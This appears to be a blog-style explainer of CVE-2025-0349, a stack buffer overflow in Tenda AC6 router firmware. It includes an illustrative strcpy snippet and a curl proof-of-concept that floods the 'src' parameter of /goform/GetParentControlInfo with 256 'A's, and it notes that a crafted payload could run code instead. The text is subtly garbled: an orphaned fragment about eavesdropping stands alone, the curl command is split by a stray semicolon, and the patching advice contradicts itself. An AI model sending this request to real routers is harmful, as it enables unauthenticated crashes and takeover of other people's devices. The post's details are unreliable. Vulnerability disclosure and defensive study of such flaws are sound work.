CVE-2025-0349 - Critical Buffer Overflow in Tenda AC6 (15.03.05.16) Explained with Exploit Example

Recently, a critical security vulnerability has been found in the Tenda AC6 router firmware, version 15.03.05.16. This vulnerability, tracked as CVE-2025-0349, allows remote attackers to gain control of the device by exploiting a buffer overflow in the /goform/GetParentControlInfo endpoint. In this exclusive, easy-to-read post, we’ll break down what the flaw is, why it’s risky, and how attackers could exploit it.

What is CVE-2025-0349?

CVE-2025-0349 is a stack-based buffer overflow vulnerability found in the GetParentControlInfo function (inside /goform/GetParentControlInfo). The vulnerability is triggered by sending a specially crafted value in the src argument (and possibly other parameters), which can overflow the buffer and let an attacker execute arbitrary code on the router — remotely.

Why is This Critical?

When a vulnerability is *stack-based*, it means that there’s a mistake in how the router stores and processes data. If an input is too long and not checked, it will overwrite other important data (like return addresses), possibly leading the attacker to run their own code — even *bricking* the device or hijacking its internet traffic!

Firmware Version: 15.03.05.16 (earlier versions may also be vulnerable)

- Vulnerable Component: /goform/GetParentControlInfo handler, especially parameter src.

How Does the Vulnerability Work?

The router’s web service accepts HTTP requests at /goform/GetParentControlInfo. One of the parameters, src, is copied directly into a fixed-size stack buffer without proper length checks.

Let’s see a *simplified* snippet of what the vulnerable logic might look like in C

void GetParentControlInfo(HttpRequest *req) {
    char src[128];
    // Vulnerable! No size check:
    strcpy(src, req->GetParam("src"));

    // ... code that might use src ...
}

> The strcpy function copies data into src, but if the attacker sends more than 128 bytes, they’ll overwrite memory on the stack. That’s a textbook buffer overflow.

Exploit Details and Example

Attackers can exploit this vulnerability remotely. They send a specially-crafted POST or GET request with a long src parameter to overflow the src buffer.

Here’s a practical example using curl (replace <router_ip> with your router’s address)

curl -X POST "http://<router_ip>/goform/GetParentControlInfo"; \
     -H "Content-Type: application/x-www-form-urlencoded" \
     --data "src=$(python -c 'print("A"*256)')"

This simple exploit sends 256 “A” characters, far more than the buffer can handle.

Eavesdrop or manipulate traffic

Note: Legitimate attackers might send a specially-crafted payload instead of repeated “A”s, letting them run code of their choice on the device.

Original Advisory:

https://nvd.nist.gov/vuln/detail/CVE-2025-0349

Related Security Feed:

https://vuldb.com/?id.249621

Firmware Download:

https://www.tenda.com.cn/download/detail-2683.html

If you are using a Tenda AC6 router

- Update your firmware immediately. Check Tenda’s official download page.

Conclusion

CVE-2025-0349 is a serious vulnerability — it’s easy to exploit, doesn’t require authentication, and lets attackers break into Tenda AC6 routers remotely. Patch your device as soon as a fix is available, and check whether your router has been exposed.

Timeline

Published on: 01/09/2025 11:15:16 UTC